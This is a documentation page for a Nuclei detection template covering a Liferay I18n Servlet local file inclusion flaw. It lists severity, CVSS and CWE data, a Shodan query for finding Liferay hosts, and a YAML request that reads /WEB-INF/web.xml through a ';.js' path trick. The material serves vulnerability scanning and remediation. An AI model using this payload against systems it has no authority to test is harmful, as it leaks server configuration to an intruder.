Liferay - Local File Inclusion
ID: liferay-resource-leak
Severity: high
Author: DhiyaneshDk
Tags: liferay,lfi,j2ee
Description
Section titled “Description”Liferay is vulnerable to local file inclusion in the I18n Servlet because it leaks information via sending an HTTP request to /[language]/[resource];.js (also .jsp works).
YAML Source
Section titled “YAML Source”id: liferay-resource-leak
info: name: Liferay - Local File Inclusion author: DhiyaneshDk severity: high description: | Liferay is vulnerable to local file inclusion in the I18n Servlet because it leaks information via sending an HTTP request to /[language]/[resource];.js (also .jsp works). remediation: Update Liferay to the latest version reference: - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Liferay" product: liferay_portal vendor: liferay tags: liferay,lfi,j2ee
http: - method: GET path: - "{{BaseURL}}/en/WEB-INF/web.xml;.js"
matchers-condition: and matchers: - type: word part: body words: - "<web-app id=" - "<?xml" condition: and
- type: word part: header words: - "application/xml"
- type: status status: - 200# digest: 4a0a00473045022100c59159adbc7cdf8d32d4819dee24b7b45641e40f80dd30419d6b368bea58adae02202874e2cc1389131870faeea2586c1dd435f38cb7cfccce6a39b6407d906fe5e9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/j2ee/liferay-resource-leak.yaml"